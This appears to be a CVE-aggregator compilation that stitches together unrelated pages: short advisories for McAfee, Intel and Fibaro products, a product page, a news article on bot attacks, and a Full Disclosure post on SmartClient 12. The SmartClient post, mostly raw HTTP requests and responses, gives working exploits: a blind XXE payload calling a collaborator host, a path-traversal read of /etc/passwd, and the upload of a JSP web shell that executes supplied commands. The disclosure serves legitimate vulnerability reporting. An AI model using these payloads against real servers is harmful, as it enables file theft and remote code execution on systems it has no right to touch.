An improper privilege management vulnerability in McAfee Security Scan Plus (MSS+) before 4.1.262.1 could allow a local user to modify a configuration file and perform a LOLBin (Living off the land) attack. This could result in the user gaining elevated permissions and being able to execute arbitrary code due to lack of an integrity check of the configuration file.

CVE-2022-37025

A vulnerability in Fibaro Motion Sensor firmware v3.4 allows attackers to cause a Denial of Service (DoS) via a crafted Z-Wave message.

Motion, light and temperature sensor

**See it in action**

**Small is beautiful**

Just under 2 inch diameter, featuring an immaculate, sleek, and modern white casing, you’ll fall in love with this motion sensor at first sight.

**Inspired by nature**

**Full mobility**

Battery-powered and completely wireless, the FIBARO Motion Sensor features a smart bracket with grip that allows it to be affixed almost anywhere – even on a wall or ceiling. The sensor’s location can be changed at any time for ultimate comfort and convenience.

**Technologically advanced**

FIBARO engineers created one of the world's most advanced technologies and placed in a miniature case.

**Compatible with other devices**

Its true potential shines when the FIBARO Motion Sensor is paired with other smart home devices. The sensor is capable of activating even the most complex sequences which are only limited by human imagination.

Motion       Lights: ON

**Multisensor**

Apart from sensing motion, the device also measures temperature and light levels, offering you a more complete motion detection solution. The accelerometer detects change in location or any attempt at opening its casing.

*   Motion sensor
*   Light sensor
*   Temperature sensor
*   Accelerometer

**Also available for Apple HomeKit**

We've created two lines of the FIBARO Motion Sensor - one for the FIBARO system or other compatible Z-Wave controllers, and one for Apple HomeKit. Whichever platform you choose, our products are designed to work seamlessly with either technology. Learn more.

**Hey Siri, has any motion been detected in the entrance?**

Available with 

**Colors indicate temperature change**

After detecting movement, the motion detector will use a different color to inform you about the current temperature in the room.

**Guarding your safety**

The FIBARO Motion Sensor is your home's ultimate guardian, watching over you and your family 24/7.

**Alarm panel**

The Fibaro Home Center panel displays more than just the current status. It also contains the history of events crucial to your safety.

**Immediate notifications**

The device will immediately inform you about any motion by sending a notification to your smart phone...

**for your convenience**

…or, by choosing appropriate settings, it won't bother you at all.

**Light intensity measurement**

A sensor hidden in the FIBARO Motion Sensor will allow you to dynamically adjust the lamps to the amount of natural light. The system will set the optimal lighting levels for everyone in the house, and illuminate the space around the building, all while conserving energy and saving money.

LIGHT SENSOR 128 LUX

**A home that wakes up with you**

The FIBARO Motion Sensor makes each morning unique. As soon as you wake up, the sensor will activate a scene that wakes up the entire house along with you.

**Always perfect lighting**

By measuring light intensity, the FIBARO Motion Sensor will adjust lighting to your needs. The sensor’s movement monitoring feature can wait until your little one is sound asleep before turning off the light. With FIBARO, you don’t need to worry abour your child when they sleep, or about wasting unnecessary energy.

LIGHT SENSOR 128 LUX

**Adjustable sensitivity levels**

The sensitivity setting of the FIBARO Motion Sensor can be changed to meet your needs. For example, adjust it to exclude the detection of small animals, like your cat or dog.

\*for devices working with Apple HomeKit this functionality requires support from mobile app

**Full control via the mobile app**

Our mobile app allows you to control and check status of the motion detector right from your phone. It is the most convenient and the easiest way to control your home from wherever you are.

Available on: 

**Watch the video**

**Choose your platform**

We've created two versions of the FIBARO Motion Sensor - one for the FIBARO system or other compatible Z-Wave controllers, and one for Apple HomeKit. Select the one compatable with your system. with either technology.

*   Bluetooth communication
*   2 years of battery life
*   Activating simple scenes
*   Voice control through Apple Siri®
*   Works with Apple devices with iOS 9 and newer.
*   Sharing home function

Buy

*   Wireless communication
*   2 years of battery life
*   Activating complex scenes
*   Smart notifications
*   Compatible with Android and iOS devices
*   A wide range of operation

Buy

CVE-2023-34597: FIBARO | Motion Sensor - Motion detector

By Deeba Ahmed
The conclusion was reached after researchers evaluated over 9,500 of the largest transactional websites in terms of traffic,…
This is a post from HackRead.com Read the original post: 68% of US Websites Exposed to Bot Attacks

The conclusion was reached after researchers evaluated over 9,500 of the largest transactional websites in terms of traffic, encompassing sectors such as banking, e-commerce, and ticketing businesses.

Bad bots are plaguing the internet, making up over 30% of internet traffic today. Cybercriminals can use them to target online businesses with fraud and other types of attacks, according to the latest research from online fraud and mitigation company DataDome.

According to a report from DataDome, a company specializing in bot and online fraud protection, released on November 28, 68% of US websites lack adequate protection against simple bot attacks, highlighting how vulnerable US businesses could be to automated cyberattacks.

The researchers assessed more than 9,500 of the largest transactional websites in terms of traffic, including banking, e-commerce, and ticketing businesses. They found that the US websites face significant risks ahead of the busy holiday shopping season. The findings also highlighted that traditional CAPTCHAs aren’t effective in preventing automated attacks.

As per DataDome’s report shared with Hackread.com ahead of publication on Tuesday, 72.3% of e-commerce websites and 65.2% of classified ad websites failed the bot tests, whereas 85% of DataDome’s fake Chrome bots remained undetected.

Among the 2,587 websites featuring one CAPTCHA tool, less than 5% could detect/block all bots. Interestingly, gambling sites were the most well-protected against bot attacks, with 31% blocking all the test bots. Only 10.2% successfully blocked all malicious bot requests.

DataDome’s Head of Research, Antoine Vastel, referred to bots as “silent assassins”, adding that bots are becoming sophisticated day-by-day and US businesses are unprepared for the “financial and reputational damage” bot attacks can cause.

This, as per Vastel, includes threats like ticket scalping, inventory hoarding, and account fraud. Vastel explained that bad bots can wreak havoc on businesses and consumers, exposing them to “unnecessary risk.”

These findings highlight the urgent need for US businesses to enhance their bot protection measures. Here are 5 key points on how owners and administrators can protect their wbsites against bot attacks:

1.  **Implement CAPTCHA and reCAPTCHA:** CAPTCHAs and reCAPTCHAs are effective tools for distinguishing between humans and bots. They can be used to prevent bots from submitting forms, signing up for accounts, or accessing restricted areas of your website.
2.  **Use IP blacklisting:** IP blacklisting involves identifying and blocking IP addresses that are known to be associated with malicious activity. This can help to prevent bots from accessing your website altogether.
3.  **Monitor website traffic:** By monitoring website traffic, you can identify patterns that may be indicative of bot activity. For example, if you see a sudden surge in traffic from a single IP address, this could be a sign that your website is under attack from a botnet.
4.  **Implement rate limiting:** Rate limiting is a technique that can be used to limit the number of requests that a user can make to your website in a given period of time. This can help to prevent bots from overwhelming your website with requests.
5.  **Use web application firewalls (WAFs):** WAFs are designed to protect websites from a variety of attacks, including bot attacks. They can be used to block malicious traffic and prevent bots from exploiting vulnerabilities in your website’s code.

****_RELATED ARTICLES_****

1.  IBM X-Force Discovers Gootloader Malware Variant- GootBot
2.  Qakbot Botnet Disrupted, Infected 700,000 Computers Globally
3.  Telekopye Toolkit Used as Telegram Bot to Scam Marketplace Users
4.  Proton CAPTCHA: New Privacy-First CAPTCHA Defense Against Bots
5.  Google Workspace Exposed to Takeover from Domain-Wide Delegation Flaw

68% of US Websites Exposed to Bot Attacks

Uncontrolled search path in the Intel(R) Distribution for Python before version 2022.0.3 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Distribution for Python Advisory**

**Revision History**

Revision

Date

Description

1.0

08/09/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-28696: INTEL-SA-00684

Improper buffer restrictions for some Intel(R) NUC 9 Extreme Laptop Kit drivers before version 2.2.0.22 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® NUC 9 Extreme Laptop Kit Advisory**

**Revision History**

Revision

Date

Description

1.0

08/09/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-21229: INTEL-SA-00665

An issue was discovered in SmartClient 12.0. Unauthenticated exploitation of blind XXE can occur in the downloadWSDL feature by sending a POST request to /tools/developerConsoleOperations.jsp with a valid payload in the _transaction parameter.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

![fulldisclosure logo](https://seclists.org/images/fulldisclosure-logo.png)**Full Disclosure mailing list archives**

_From_: Red Team <redteam () certimetergroup com>  
_Date_: Tue, 18 Feb 2020 14:23:46 +0000  

Hello,

We are informing you about some vulnerabilities we found in SmartClient\_v120.

1. Description
During an analysis on the Isomorphic Smartclient v12 LGPL version, we found multiple security flaws that are here 
described.
The application we tested  (SmartClient\_v120p\_2019-06-13\_LGPL) can be downloaded from official website. 
(https://www.smartclient.com/product/download.jsp)
As today is the latest version.

1) Information Disclosure on absolute path
The path “/tools/developerConsoleOperations.jsp” allows a user to test some functionalities. The server accepts in the 
\_transaction parameter XML data and in the appID a valid name; The vulnerable functionality should be also reachable 
from /isomorphic/IDACall.
If a user makes a request on this path, the server replies with a verbose error showing where the application resides 
(his absolute path). This issue can be used by a malicious user to improve his knowledge about the environment and used 
for further attacks and to.
The path is reachable without any authentication by default.

2) XML External Entity on downloadWSDL
The path “/tools/developerConsoleOperations.jsp” allows a user to test some functionalities. The server accepts in the 
\_transaction parameter XML data and in the appID a valid name.
A WSDL describes the structure of a SOAP webservice and is basically an XML file.
The isomorphic downloadWSDL functionality allows to download and verify a new WSDL (Web Services Description Language).
The WSDL document source of the document isn’t checked at all and an attacker can provide a malicious XML file to 
trigger a blind XXE vulnerability.
The path is reachable without any authentication by default.

Here there is the javadoc of the resource: 
https://www.smartclient.com/smartgwtee-12.1/server/javadoc/com/isomorphic/rpc/BuiltinRPC.html#downloadWSDL-java.lang.String-java.lang.String-java.lang.String-com.isomorphic.rpc.RPCManager-javax.servlet.http.HttpServletRequest-javax.servlet.http.HttpServletResponse-

3) Local File Inclusion on loadFile method
The Remote Procedure Call (RPC) ‘loadFile’ provided by the console functionality on the 
/tools/developerConsoleOperations.jsp URL is affected by an LFI issue; The vulnerable functionality should be also 
reachable from /isomorphic/IDACall.
It’s possible to tamper the elem tag in the XML contained in the \_transaction POST parameter with a path traversal 
payload to exfiltrate arbitrary file from the file-system.
The path is reachable without any authentication by default.

Here there is the javadoc of the resource: 
https://www.smartclient.com/smartgwtee-12.1/server/javadoc/com/isomorphic/rpc/BuiltinRPC.html#loadFile-java.lang.String-

4) Arbitrary File Upload on SaveFile that could lead to RCE
The Remote Procedure Call (RPC) ‘saveFile’ provided by the console functionality on the 
/tools/developerConsoleOperations.jsp URL allows a user to upload any file; The vulnerable functionality should be also 
reachable from /isomorphic/IDACall.
There isn’t any check on the file extension or its content.
The data accepted by the server code shouldn’t contain any characters that is used in the XML syntax like “<”. This 
limit can be bypassed using the comment of the XML with “<!\[CDATA\[“.
The saved file can be reached inside the web-root with the name of the file used during the file upload.
Also, a file can be uploaded outside the web-root with a path traversal on the file system.
As a test we uploaded a file to /../../../../../../../../../../../tmp/test.txt. This allow an attacker to potentially 
rewrite system files, depending on the current user that execute isomorphic.
The path is reachable without any authentication by default.

Here there is the javadoc of the resource: 
https://www.smartclient.com/smartgwtee-12.1/server/javadoc/com/isomorphic/rpc/BuiltinRPC.html#saveFile-java.lang.String-java.lang.String-

2. Step to reproduce:
- Download the open source version of SmartClient 12.0 from: 
https://www.smartclient.com/product/download-bounce.jsp?product=smartclient&license=lgpl&version=12.0p&nightly=true
- Unzip the archive and navigate in smartclientSDK
- Run the script "start\_embedded\_server.sh". A web server with an istance of smartclient will be at 
http://localhost:8080
- Use the following payloads to trigger the vulnerabilities.


===========================================================================================================================================================================================
===========================================================================================================================================================================================

1) Information Disclosure on absolute path
POST /isomorphic/IDACall?isc\_rpc=1&isc\_v=asd&isc\_tnum=3&isc\_dd=a HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 610
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/isomorphic/system/helpers/Log.html
Cookie: 
GLog=%7B%0A%20%20%20%20isc\_pageURL%3A%22http%3A//localhost%3A8081/docs/resources/explorer.html%22%2C%20%0A%20%20%20%20isc\_pageGUID%3A%22BEF212E4-B94A-4030-B4C4-EFA951EFD204%22%2C%20%0A%20%20%20%20priorityDefaults%3A%7B%0A%20%20%20%20%20%20%20%20sgwtInternal%3A1%2C%20%0A%20%20%20%20%20%20%20%20Log%3A4%0A%20%20%20%20%7D%2C%20%0A%20%20%20%20defaultPriority%3A3%2C%20%0A%20%20%20%20left%3A0%2C%20%0A%20%20%20%20top%3A0%2C%20%0A%20%20%20%20width%3A996%2C%20%0A%20%20%20%20height%3A549%2C%20%0A%20%20%20%20trackRPC%3Anull%0A%7D;
 JSESSIONID=8CF7DFB620FA8D796DE055F83901909D
Upgrade-Insecure-Requests: 1

\_transaction=<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance"; 
xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">5</transactionNum><operations xsi:type="xsd:List"><elem 
xsi:type="xsd:Object"><appID>XXXXXXX</appID><className>TEST</className><methodName>downloadWSDL</methodName><arguments 
xsi:type="xsd:List"><elem>http://10.1.100.6:8000/test.xml</elem><elem>xml</elem><elem>aaaaaa.xml</elem></arguments><is\_ISC\_RPC\_DMI
 
xsi:type="xsd:boolean">true</is\_ISC\_RPC\_DMI></elem></operations><jscallback>iframe</jscallback></transaction>&protocolVersion=1.0&\_\_iframeTarget\_\_=isc\_HiddenFrame\_0

Response from server:
HTTP/1.1 200
Set-Cookie: JSESSIONID=41CEC8DFC7B8968C0D7EDCABB0A5924B; Path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 02 Oct 2019 15:55:02 GMT
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Oct 2019 15:55:02 GMT
Connection: close
Content-Length: 874

<HTML>
<BODY ONLOAD='var results = document.formResults.results.value;if (!(new 
RegExp("^(\\\\d{1,3}\\\\.){3}\\\\d{1,3}$").test(document.domain))) {while (!window.isc && document.domain.indexOf(".") != -1 
) { try { parent.isc; break;} catch (e) {document.domain = document.domain.replace(/.\*?\\./, 
"");}}}parent.isc.Comm.hiddenFrameReply(5,results)'><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><FORM
 name='formResults'><TEXTAREA readonly name='results'>
//isc\_RPCResponseStart-->\[{data:"An error occurred when executing this operation on the server.\\nException details are 
as follows:\\n\\njava.lang.Exception: Unable to locate XXXXXXX.app.xml - check to make sure it's available in 
/mnt/c/Users/XXXXXXX/Desktop/smartclient/SmartClient\_v120p\_2019-06-13\_LGPL/smartclientSDK/shared/app",status:-1}\]//isc\_RPCResponseEnd</TEXTAREA></FORM>
</BODY></HTML>

===========================================================================================================================================================================================
===========================================================================================================================================================================================

2) XML External Entity on downloadWSDL
For this vulnerability, it's necessary create a local python server to get a valid blind xxe payload such as:
<?xml version="1.0" ?>
<!DOCTYPE root \[
<!ENTITY % ext SYSTEM "http://UNIQUE\_ID\_FOR\_BURP\_COLLABORATOR.burpcollaborator.net/x";> %ext;
\]>
<r></r>

Save the payload in a file (e.g. xxe.xml) and start a python server: python -m SimpleHTTPServer 10000

Use this request to trigger the XXE:

POST /tools/developerConsoleOperations.jsp?isc\_rpc=1&isc\_v=v12.0p\_2019-06-13&isc\_tnum=13 HTTP/1.1
Host: 10.1.100.8:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 616
Connection: close
Upgrade-Insecure-Requests: 1

\_transaction=<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance"; 
xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">13</transactionNum><operations xsi:type="xsd:List"><elem 
xsi:type="xsd:Object"><appID>isc\_builtin</appID><className>builtin</className><methodName>downloadWSDL</methodName><arguments
 
xsi:type="xsd:List"><elem>http://localhost:10000/xxe.xml</elem><elem>xml</elem><elem>aaaaa</elem></arguments><is\_ISC\_RPC\_DMI
 
xsi:type="xsd:boolean">true</is\_ISC\_RPC\_DMI></elem></operations><jscallback>iframe</jscallback></transaction>&protocolVersion=1.0&\_\_iframeTarget\_\_=isc\_HiddenFrame\_5

===========================================================================================================================================================================================
===========================================================================================================================================================================================

3) Local File Inclusion on loadFile method
With the following payload can be retrieved the "/etc/passwd":

POST /isomorphic/IDACall?isc\_rpc=1&isc\_v=asd&isc\_tnum=3&isc\_dd=a HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 686
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/isomorphic/system/helpers/Log.html
Cookie: 
GLog=%7B%0A%20%20%20%20isc\_pageURL%3A%22http%3A//localhost%3A8081/docs/resources/explorer.html%22%2C%20%0A%20%20%20%20isc\_pageGUID%3A%22BEF212E4-B94A-4030-B4C4-EFA951EFD204%22%2C%20%0A%20%20%20%20priorityDefaults%3A%7B%0A%20%20%20%20%20%20%20%20sgwtInternal%3A1%2C%20%0A%20%20%20%20%20%20%20%20Log%3A4%0A%20%20%20%20%7D%2C%20%0A%20%20%20%20defaultPriority%3A3%2C%20%0A%20%20%20%20left%3A0%2C%20%0A%20%20%20%20top%3A0%2C%20%0A%20%20%20%20width%3A996%2C%20%0A%20%20%20%20height%3A549%2C%20%0A%20%20%20%20trackRPC%3Anull%0A%7D;
 JSESSIONID=8CF7DFB620FA8D796DE055F83901909D
Upgrade-Insecure-Requests: 1

\_transaction=<transaction+xmlns%3axsi%3d"http%3a//www.w3.org/2000/10/XMLSchema-instance"+xsi%3atype%3d"xsd%3aObject"><transactionNum+xsi%3atype%3d"xsd%3along">3</transactionNum><operations+xsi%3atype%3d"xsd%3aList"><elem+xsi%3atype%3d"xsd%3aObject"><appID>isc\_builtin</appID><className>builtin</className><methodName>loadFile</methodName><arguments+xsi%3atype%3d"xsd%3aList"><elem>../../../../../../../../../../../../../../../../../../etc/passwd</elem><elem>xml</elem><elem>asd.xml</elem></arguments><is\_ISC\_RPC\_DMI+xsi%3atype%3d"xsd%3aboolean">true</is\_ISC\_RPC\_DMI></elem></operations><jscallback>iframe</jscallback></transaction>&protocolVersion=1.0&\_\_iframeTarget\_\_=isc\_HiddenFrame\_0

Response from server:
HTTP/1.1 200
Cache-Control: no-cache
Pragma: no-cache
Expires: Fri, 04 Oct 2019 13:48:05 GMT
Content-Type: text/html;charset=UTF-8
Date: Fri, 13 Sep 2019 13:48:05 GMT
Connection: close
Content-Length: 1615

<HTML>
<BODY ONLOAD='var results = 
document.formResults.results.value;iframjje'><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><FORM
 name='formResults'><TEXTAREA readonly name='results'>
//isc\_RPCResponseStart-->\[{data:"root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\\nsync:x:4:65534:sync:/bin:/bin/sync\\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\\nlist:x:38:38:Mailing
 List Manager:/var/list:/usr/sbin/nologin\\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\\ngnats:x:41:41:Gnats 
Bug-Reporting System 
(admin):/var/lib/gnats:/usr/sbin/nologin\\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\\n\_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\\nsystemd-timesync:x:101:102:systemd
 Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\\nsystemd-network:x:102:103:systemd Network 
Management,,,:/run/systemd:/usr/sbin/nologin\\nsystemd-resolve:x:103:104:systemd 
Resolver,,,:/run/systemd:/usr/sbin/nologin\\nredTeamCMG:x:1000:1000:,,,:/home/XXXXXXXX:/bin/bash\\nmessagebus:x:104:110::/nonexistent:/usr/sbin/nologin\\n",status:0}\]//isc\_RPCResponseEnd</TEXTAREA></FORM>
</BODY></HTML>

===========================================================================================================================================================================================
===========================================================================================================================================================================================

4) Arbitrary File Upload on SaveFile that lead to RCE
POST /isomorphic/IDACall?isc\_rpc=1&isc\_v=asd&isc\_tnum=3&isc\_dd=a HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1440
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/isomorphic/system/helpers/Log.html
Cookie: 
GLog=%7B%0A%20%20%20%20isc\_pageURL%3A%22http%3A//localhost%3A8081/docs/resources/explorer.html%22%2C%20%0A%20%20%20%20isc\_pageGUID%3A%22BEF212E4-B94A-4030-B4C4-EFA951EFD204%22%2C%20%0A%20%20%20%20priorityDefaults%3A%7B%0A%20%20%20%20%20%20%20%20sgwtInternal%3A1%2C%20%0A%20%20%20%20%20%20%20%20Log%3A4%0A%20%20%20%20%7D%2C%20%0A%20%20%20%20defaultPriority%3A3%2C%20%0A%20%20%20%20left%3A0%2C%20%0A%20%20%20%20top%3A0%2C%20%0A%20%20%20%20width%3A996%2C%20%0A%20%20%20%20height%3A549%2C%20%0A%20%20%20%20trackRPC%3Anull%0A%7D;
 JSESSIONID=8CF7DFB620FA8D796DE055F83901909D
Upgrade-Insecure-Requests: 1

\_transaction=<transaction+xmlns%3axsi%3d"http%3a//www.w3.org/2000/10/XMLSchema-instance"+xsi%3atype%3d"xsd%3aObject"><transactionNum+xsi%3atype%3d"xsd%3along">5</transactionNum><operations+xsi%3atype%3d"xsd%3aList"><elem+xsi%3atype%3d"xsd%3aObject"><appID>isc\_builtin</appID><className>builtin</className><methodName>saveFile</methodName><arguments+xsi%3atype%3d"xsd%3aList"><elem>/shell.jsp</elem><elem>
<!\[CDATA\[+
<%25%40+page+import%3d"java.util.\*,java.io.\*"%25>
<HTML><BODY>
<FORM+METHOD%3d"GET"+NAME%3d"myform"+ACTION%3d"">
<INPUT+TYPE%3d"text"+NAME%3d"cmd">
<INPUT+TYPE%3d"submit"+VALUE%3d"Send">
</FORM>
<pre>
<%25
if+(request.getParameter("cmd")+!%3d+null)+{
++++++++out.println("Command%3a+"+%2b+request.getParameter("cmd")+%2b+"<BR>")%3b
++++++++Process+p+%3d+Runtime.getRuntime().exec(request.getParameter("cmd"))%3b
++++++++OutputStream+os+%3d+p.getOutputStream()%3b
++++++++InputStream+in+%3d+p.getInputStream()%3b
++++++++DataInputStream+dis+%3d+new+DataInputStream(in)%3b
++++++++String+disr+%3d+dis.readLine()%3b
++++++++while+(+disr+!%3d+null+)+{
++++++++++++++++out.println(disr)%3b+
++++++++++++++++disr+%3d+dis.readLine()%3b+
++++++++++++++++}
++++++++}
%25>
</pre>
</BODY></HTML>
\]\]>
</elem></arguments><is\_ISC\_RPC\_DMI+xsi%3atype%3d"xsd%3aboolean">true</is\_ISC\_RPC\_DMI></elem></operations><jscallback>iframjje</jscallback></transaction>&protocolVersion=1.0&\_\_iframeTarget\_\_=isc\_HiddenFrame\_0

Response from server:
HTTP/1.1 200
Cache-Control: no-cache
Pragma: no-cache
Expires: Fri, 04 Oct 2019 13:59:05 GMT
Content-Type: text/html;charset=UTF-8
Date: Fri, 13 Sep 2019 13:59:05 GMT
Connection: close
Content-Length: 352

<HTML>
<SCRIPT>document.domain = 'a';</SCRIPT>
<BODY ONLOAD='var results = 
document.formResults.results.value;iframjje'><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><FORM
 name='formResults'><TEXTAREA readonly name='results'>
//isc\_RPCResponseStart-->\[{data:null,status:0}\]//isc\_RPCResponseEnd</TEXTAREA></FORM>
</BODY></HTML>

After upload navigate to http://local\_smartclient:PORT/shell.jsp?cmd=whoami

===========================================================================================================================================================================================
===========================================================================================================================================================================================

Timeline
- 29/10/2019 Sent the first email to developers (info\[at\]smartclient.com, support\[at\]smartclient.com). No response.
- 05/11/2019 Sent the second email to developers (info\[at\]smartclient.com, support\[at\]smartclient.com). No response.
- 18/02/2020 Issues published on seclist.org

--
RedTeam

Certimeter Group
Corso Svizzera, 185 - 10149 - Torino
Piazza IV Novembre, 4 - 20124 - Milano
Tel +39 011 7741894
www.certimetergroup.com

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Multiple vulnerabilities in SmartClient\_v12** _Red Team (Feb 18)_

CVE-2020-9352: Full Disclosure: Multiple vulnerabilities in SmartClient_v12

This Metasploit module performs a container escape onto the host as the daemon user. It takes advantage of the SYS_MODULE capability. If that exists and the linux headers are available to compile on the target, then we can escape onto the host.

